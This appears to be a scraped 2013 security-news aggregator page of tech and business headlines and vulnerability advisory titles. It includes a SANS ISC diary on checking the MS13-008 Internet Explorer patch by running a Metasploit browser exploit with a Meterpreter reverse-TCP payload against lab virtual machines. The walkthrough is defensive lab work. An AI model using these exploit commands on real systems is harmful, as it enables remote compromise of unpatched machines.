Hackin9
Cuba's Internet speeds increased on Tuesday, and the country appears to be routing more traffic through a previously dormant undersea fiber-optic cable, according to Internet monitoring company Renesys.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Google's fourth-quarter revenue was up 36 percent from the previous year, thanks to continued growth in its advertising business.
 
Making the most of a sluggish world economy, IBM managed to increase its net income by 5 percent in 2012, even though revenue shrank by 2 percent.
 
Advanced Micro Devices' financial struggles continued in the fourth quarter, with revenue sinking 32 percent due to slow chip sales and charges tied to restructuring and inventory adjustments.
 
 
U.S. lawmakers on Tuesday urged government officials to clamp down on bad IT contracts and limit duplication across projects, with an estimated one quarter of federal spending on IT wasted every year.
 
Tablets and smartphones will give a much-needed boost this year to the worldwide microprocessor market, which is undergoing a fundamental change with a shift to low-power processors used in energy-efficient devices, research firm IC Insights said.
 
Google's fourth-quarter revenue was up 36 percent from the previous year, thanks to continued growth in its advertising business.
 
For every person using 4G LTE now, there will be at least one more subscriber by the end of this year, IHS iSuppli says.
 
Oracle MySQL CVE-2012-2749 Denial Of Service Vulnerability
 
Deep Space Industries is looking to launch spacecraft to mine asteroids and one day act as an outer space gas station and an oasis for human colonies in space.
 
The number of patients monitored at home by healthcare providers is expected to grow from 308,000 today to 1.8 million in 2017.
 
As it has in the past, SAP spilled the beans a bit early on its fourth-quarter and year-end performance with the release of preliminary results last week. On Wednesday, the vendor is about to fill in the details.
 
Oracle MySQL Server CVE-2013-0384 Remote Security Vulnerability
 
Users who signed into third-party Web or mobile applications using their Twitter accounts might have given those applications access to their Twitter private "direct" messages without knowing it, according to Cesar Cerrudo, CTO of IOActive.
 
Microsoft will ship the Surface Windows 8 Pro tablet with an Intel Core i5 processor on Feb. 9, with prices starting at US$899.
 
Oracle MySQL Server CVE-2012-0574 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2012-0578 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2012-5060 Remote Security Vulnerability
 
Oracle MySQL Server CVE-2013-0371 Remote Security Vulnerability
 
A NASA spacecraft is sending back evidence that a deep crater on Mars once held a groundwater-fed lake.
 
Wordpress Valums Uploader - File Upload Vulnerability
 

Introduction

Earlier last week a reader wrote in and asked us if the patch for MS13-008 [1] [2] had worked. To do a comprehensive patch validation could take a significant amount of time however there are a couple of things you can do to get a quick sanity check.

I use Metasploit when doing patch sanity checks. Also, with a Virtual Machine you can take snapshots at various stages of patching. In this case my system is configured for VMWare Fusion Version 5.0.2 (900491) [4] and using Metasploit. Instructions for install of Metasploit exist all over the Internet so we will not reproduce that here. A great install for OS X Mountain Lion can be found here [5] however I avoid the Java component.

My setup includes two lab copies of Windows XP (I have been meaning to update to Windows 7 ), one that is not patched and one that is fully patched.

Using Google to Find Things

To run my quick sanity check, I will first locate the exploit within Metasploit ExploitDB. There are a couple of ways to achieve this. I usually start with a quick Google check first to locate the Metasploit page on MS13-008. Putting:



site:metasploit.com ms13-008



In my search bar yields what Im looking for at the top of the results [6].



Note: You can take a look at this great presentation on some googleFu [7] and there are many books on the subject.



Setting the Trap

Second is to get Metasploit running on an attacker machine and run the setup for the exploit of MS13-008. We do this by navigating to the page that shows us where the exploit is in the exploitDB [6]. We find from the documentation that what we are looking for is located at:



exploit/windows/browser/ie_cbutton_uaf



So we run the command:



use exploit/windows/browser/ie_cbutton_uaf



Looking at the exploit documentation we are going to stick with the basic usage and enter:



set PAYLOAD windows/meterpreter/reverse_tcp



Then we enter in the next command and set it to our host only IP:



set LHOST host only IP



And then enter:



exploit



From here you should see output like the below image:





My setup is simple. I have two virtual machines ready to go, one fully patched and one that is unpatched. We will look for a successful exploit to validate the Metasploit payload. Secondarily we will run it against a fully patched system and insure that it fails.

Note: Take Snapshots of virtual machines. It is a royal pain when you forget to do this !



Springing the Trap

The first step on the target machine is to start Process Hacker [8] so we can observe the hack process start. This also allows us to watch some behavior as it occurs (cause we like that stuff right? ). Then we copy and paste the exploit ready web location into our target machines browser and watch the magic!



At this point we know the unpatched version of the Virtual Machine is exploited and MS13-008 is a successful vector as process hacker is showing the injection.







Checking the Patch

Now for the quick sanity check and patch validation. Run the same exploit on your fully patched target virtual machine and the exploit should fail. In my case both my local VM anti-virus caught the exploit and the exploit failed after the anti-virus was disabled.

Copy and paste your exploit location into the patch validation target and watch the metasploit output.

In this case we are going to do a little bit more of a deeper monitor as we dont want to just trust what we see in Process Hacker. So we fire up RegShot [8] and take a one time snapshot, and we take a snapshot setting c: as the start directory.

Note:This can take some time.



After this is complete we then copy and paste our exploit location into the target browser and check our results. Sure enough, Metasploit sents the malacious exploit payload but does not seem to get a process connect:



We then continue to do a quick check with Process Hacker and look at processes.



And finally we check a second RegShot and look at any changes to the operating system.



After review of the Regshot logs we can say with some confidence that the patched system survived the attack.

We then enable our patched and updated Anti-Virus suite and run the attack again to check our AV signatures. It also picked up the attack.





Conclusion

In the fast paced often interupt driven lives we live in this method can act as a fast validation. Often times, when a reader writes in and asks if a patch took, this is the process I will use if I am in a hurry ( which is often the case). This is of course taking into account that an exploit has been added to the Metasploit Database. There are other methods and remember this is just a quick check.





[1] http://isc.sans.edu/diary/January+2013+Microsoft+Out+of+Cycle+Patch/14941

[2] http://technet.microsoft.com/en-us/security/bulletin/ms13-008

[3] http://www.metasploit.com/

[4] http://www.vmware.com/products/fusion/overview.html

[5] http://www.darkoperator.com/installing-metasploit-framewor/

[6] http://www.metasploit.com/modules/exploit/windows/browser/ie_cbutton_uaf

[7] http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf

[8] http://sourceforge.net/projects/regshot/





Richard Porter

--- ISC Handler on Duty
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Re: [SE-2012-01] Java 7 Update 11 confirmed to be vulnerable
 
PHP 'openssl_encrypt()' Function Information Disclosure Vulnerability
 
CVE-2013-1402 - DigiLIBE Management Console - Execution After Redirect (EAR) Vulnerability
 
SEC Consult SA-20130122-1 :: F5 BIG-IP SQL injection vulnerability
 
SEC Consult SA-20130122-0 :: F5 BIG-IP XML External Entity Injection vulnerability
 
Wordpress Developer Formatter CSRF Vulnerability
 
Looking for security contacts
 
[SECURITY] [DSA 2611-1] movabletype-opensource security update
 
Attorney and risk consultant Doug DePeppe continues the discussion on what the U.S. cybersecurity doctrine should look like.
 
Responding to a growing user base of online service providers, VoltDB has outfitted its namesake in-memory database management system with additional tools to communicate with other technologies usually found in a Web applications stack.
 
The parent company of Alltel, a mobile telephone network serving rural customers in six states, has agreed to sell the business to AT&T for about $780 million, Atlantic Tele-Network announced Tuesday.
 
A note from security luminary Dan Geer to those middling firms that are not yet resource-rich enough for how information-rich they already are.
 
Hulu did it for video, and Spotify did it for music. Now Roozz is hoping to do the same thing for software: bring it to the cloud, in a hosted, pay-as-you-need-it format. Roozz End User (free) is slickly designed and mostly easy to use, but, for now, at least, it's a bit hampered by a limited title selection and a few technical glitches.
 
A Canadian student who ran web vulnerability detection tools on his college's administration systems as he attempted to check whether a security vulnerability he had reported had been fixed has been expelled for his efforts


 
[SECURITY] [DSA 2610-1] ganglia security update
 
Western Digital has acquired data protection company Arkeia Software as it looks to address growing storage demands among small and medium-size companies.
 
Survey also shows greater business alignment a goal, but moreso than usual
 
Mozilla has launched Keon and Peak, two smartphones based on the web-centric Firefox OS platform.
 
Verizon Communications posted a net loss of $1.9 billion during the fourth quarter of 2012, but the losses were due to a series of one-time expenses announced earlier.
 
Those who want to try the much-hyped Hadoop but haven't got a cluster or two to spare can now test the data processing platform on their desktops, thanks to a new release from Hadoop distributor Hortonworks.
 
A Canadian student who ran web vulnerability detection tools on his college's administration systems as he attempted to check whether a security vulnerability he had reported had been fixed has been expelled for his efforts


 
Micron today announced it's highest endurance SSD for servers, the P400m, boasting the ability to fill a 400GB drive 10 times a day for five years.
 
It appears that a dispute between browser makers and the Chinese government over train tickets may have led to the Github project hosting platform getting blocked in China


 
Security company Trend Micro has released a report on what it is has dubbed Fakem RATs - trojans which attempt to conceal their communications by mimicking common instant messaging protocols


 
IBM Tivoli Federated Identity Manager 'OpenID' Attribute Validation Security Bypass Vulnerability
 
Twitter's service had problems on Monday for over six hours with some users complaining the service was slow, while others could not access the service.
 
NEC Casio's forthcoming Medias W Android smartphone has two 4.3-inch touch screens arranged back-to-back on a hinge.
 
IBM Intelligent Operations Center HTML Injection Vulnerability
 
Beset by some very public vulnerabilities in Java, and apparently unable to properly patch those bugs, Oracle must dramatically step up its security game, experts said.
 
As the threat of federal budget cuts hover, IT managers are turning to agile development to speed up projects and quickly show their value.
 
Cisco VPN Client for Windows CVE-2012-5429 Local Denial of Service Vulnerability
 

What makes a good information security professional?
Help Net Security
"The infosec market has changed dramatically over the past decade. Changes in regulations, such as SOX, PCI DSS and Data Protection, and increased threats from online criminals have raised the profile of information security. At the moment, infosec in ...

 

Posted by InfoSec News on Jan 21

Forwarded from: Hafez Kamal <aphesz (at) hackinthebox.org>

Happy belated 2013 everyone! This is a gentle reminder that the The
Call for Papers for #HITB2013AMS (the fourth annual HITBSecConf in
Amsterdam) closes on the 8th of February. We're looking for talks that
are highly technical, but most importantly, material which is new and
cutting edge. In short, please don't submit if you're merely going to
rehash your talks from...
 

Posted by InfoSec News on Jan 21

http://www.informationweek.com/security/attacks/operation-red-october-attackers-wielded/240146621

By Mathew J. Schwartz
InformationWeek
January 18, 2013

The Red October malware network is one of the most advanced online espionage
operations that's ever been discovered. That's the conclusion of Moscow-based
security firm Kaspersky Lab, which first discovered Operation Red
October--"Rocra" for short--in October 2012....
 

Posted by InfoSec News on Jan 21

http://arstechnica.com/security/2013/01/canadian-student-expelled-for-playing-security-white-hat/

By Sean Gallagher
Ars Technica
Jan 21 2013

A 20-year-old Canadian computer science student has become, depending on your
point of view, a martyr for computer security or a cautionary tale for students
and others who take an interest in exposing security flaws in software
products. While Ahmed Al-Khabaz said he felt he had a "moral...
 

Posted by InfoSec News on Jan 21

http://www.theregister.co.uk/2013/01/22/pwn2own_web_plugin_prize/

By Iain Thomson in San Francisco
The Register
22nd January 2013

The organizers of the Pwn2Own hacking competition held at the annual CanSecWest
security conference have upped the prize pool to $US560,000 and will now be
offering prizes for hacking web plug-ins from Adobe and Oracle.

The contest, which dropped mobile phone hacking last year, has added web
plug-in hacking to...
 

Posted by InfoSec News on Jan 21

http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=1026

By Stew Magnuson
National Defense
1/17/2013

In a time of hiring freezes and great budget uncertainty, the Air Force
plans to hire more than 1,000 personnel at its wing devoted to
cyber-operations.

The 24th Air Force, located at Lackland Air Force Base, in San Antonio,
Texas, will “hopefully” add “well over” 1,000 mostly civilian new hires
over the span of two...
 
Vino CVE-2012-4429 Information Disclosure Vulnerability
 
Internet Storm Center Infocon Status